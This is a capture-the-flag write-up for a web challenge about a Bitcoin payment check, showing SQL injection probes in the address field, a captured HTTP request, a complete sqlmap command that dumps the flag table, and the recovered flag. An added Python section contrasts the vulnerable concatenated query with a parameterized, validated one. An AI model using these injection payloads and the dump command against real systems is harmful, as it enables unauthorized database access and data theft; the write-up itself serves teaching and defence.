Description:
Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which are non-related to the challenge have been removed

Solution:
1. The website has two functions: "Get our bitcoin address" and "Verify payment".
2. "Get our bitcoin address" generates a Bitcoin address and then goes to the page that verifies it.
3. The verification fails because there is not enough money. I guess that after generating the address the site inserts it into a database, and "Verify payment" checks against that record. I tried SQL injection in the address field:
    ' or 1=1# --- Found more than 1 records?
    ' or 1=2# --- does not have enough confirmed money?
4. The two different responses confirm that the address parameter is vulnerable to SQL injection. I used Burp Suite to capture the HTTP request and copied it to a text file:

    POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
    Host: 52.197.140.254
    Proxy-Connection: keep-alive
    Content-Length: 79
    Cache-Control: max-age=0
    Origin: http://52.197.140.254
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
    Accept-Encoding: gzip, deflate
    Accept-Language: th,en;q=0.8

    address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

5. I used sqlmap's -r option to load the HTTP request from the text file. sqlmap identified the vulnerability as time-based blind SQL injection. The final sqlmap command used to get the flag:

    python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

6. Wait several minutes for sqlmap to retrieve the flag.
In Burp Suite (Union Based)
Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
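The two responses in step 3 are what a query built by string concatenation produces, and a bound parameter removes them. The following is an added example, not the challenge's code or part of the original write-up. Assumptions: the table schema, the flag price, the server logic in `respond`, the "invalid address" and "flag released" messages, and the use of SQLite in place of MySQL (so the probes end in `-- ` instead of `#`).

```python
import re
import sqlite3

MANY = "Found more than 1 records?"             # response quoted in the write-up
POOR = "does not have enough confirmed money?"  # response quoted in the write-up
PRICE = 1000.0                                  # assumed flag price

def make_db():
    """In-memory stand-in for the challenge database (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE addresses (address TEXT, confirmed REAL)")
    db.executemany("INSERT INTO addresses VALUES (?, ?)", [
        ("1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c", 0.0),   # address from the write-up
        ("1ConstructedSampleAddressForDemo22", 0.0),   # constructed
    ])
    return db

def respond(rows):
    """Assumed server logic that yields the two messages seen in step 3."""
    if len(rows) > 1:
        return MANY
    if not rows or rows[0][1] < PRICE:
        return POOR
    return "flag released"

def verify_vulnerable(db, address):
    # User input is concatenated into the statement, so a quote ends the
    # string literal and the rest of the input is parsed as SQL.
    sql = "SELECT address, confirmed FROM addresses WHERE address = '%s'" % address
    return respond(db.execute(sql).fetchall())

# Legacy Base58 address shape: leading 1 or 3, 26 to 35 characters in total.
ADDRESS_RE = re.compile(r"[13][1-9A-HJ-NP-Za-km-z]{25,34}")

def verify_hardened(db, address, validate=True):
    if validate and not ADDRESS_RE.fullmatch(address):
        return "invalid address"
    # Bound parameter: the driver passes the value as data, never as SQL text.
    sql = "SELECT address, confirmed FROM addresses WHERE address = ?"
    return respond(db.execute(sql, (address,)).fetchall())

if __name__ == "__main__":
    db = make_db()
    for probe in ("' or 1=1-- ", "' or 1=2-- "):
        print(repr(probe), "| vulnerable:", verify_vulnerable(db, probe),
              "| bound only:", verify_hardened(db, probe, validate=False),
              "| hardened:", verify_hardened(db, probe))
```

With the bound query alone (`validate=False`) both probes return the same message, so the true/false difference that step 3 relied on no longer exists; the format check then rejects them before any query runs.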